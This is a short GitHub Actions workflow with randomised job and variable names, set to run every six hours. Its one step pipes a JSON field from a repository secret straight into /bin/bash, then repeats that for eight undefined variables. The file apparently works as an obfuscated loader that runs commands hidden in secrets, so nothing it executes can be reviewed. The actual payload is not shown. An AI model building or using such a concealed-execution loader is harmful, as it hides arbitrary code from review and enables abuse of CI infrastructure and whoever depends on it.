name: wanf2xy

on:
  workflow_dispatch:
  schedule:
    - cron: '7 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wanf2xy
        env:
          zo75: ${{ secrets.zo75 }}
        run: |
          echo $zo75 | jq -r .xjlt50096 | /bin/bash
          echo $wrqn48 | jq -r .sy20 | /bin/bash
          echo $phm4 | jq -r .gvjqs611 | /bin/bash
          echo $hm23 | jq -r .pkwpt51259 | /bin/bash
          echo $ainfz02 | jq -r .cppf7647 | /bin/bash
          echo $e9472 | jq -r .fz29542 | /bin/bash
          echo $spy43 | jq -r .erl78 | /bin/bash
          echo $lipwq56884 | jq -r .i43344 | /bin/bash
          echo $xa1 | jq -r .fr2 | /bin/bash

